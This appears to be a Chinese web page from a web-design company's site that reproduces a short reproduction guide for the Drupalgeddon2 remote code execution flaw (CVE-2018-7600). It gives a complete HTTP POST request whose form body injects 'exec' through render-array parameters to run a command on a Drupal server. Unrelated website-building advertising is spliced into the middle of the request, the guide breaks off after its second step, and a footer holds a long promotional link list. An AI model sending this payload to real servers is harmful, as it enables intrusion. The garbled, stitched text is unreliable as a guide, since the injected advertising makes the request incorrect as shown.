DrupalDrupalgeddon2远程执行代码漏洞(

漏洞复现:
1.参考a2u / CVE-2018-7600,我们可以向drupal发送以下请求:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

在昌都等地区,都构建了全面的区域性战略布局,加强发展的系统性、市场前瞻性、产品创新能力,以专注、极致的服务理念,为客户提供成都网站建设、网站设计 网站设计制作定制网站建设,公司网站建设,企业网站建设,成都品牌网站建设,营销型网站建设,外贸营销网站建设,昌都网站建设费用合理。

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

2.burp捉包
Drupal Drupalgeddon 2远程执行代码漏洞(


网页名称:DrupalDrupalgeddon2远程执行代码漏洞(
当前链接:http://csruizhi.cn/article/iihcde.html

其他资讯

Copyright © 2007-2024 成都优众联杰科技有限公司 All Rights Reserved 蜀ICP备2024116266号
友情链接: 手机网站建设套餐 专业网站设计 手机网站制作设计 专业网站建设 广安网站设计 成都网站建设 手机网站制作 成都营销网站制作 成都网站设计 成都网站设计 成都网站建设 高端网站设计 成都企业网站建设公司 网站建设方案 成都网站建设公司 H5网站制作 成都定制网站建设 网站建设 企业网站建设 成都网站设计 企业网站建设公司 重庆企业网站建设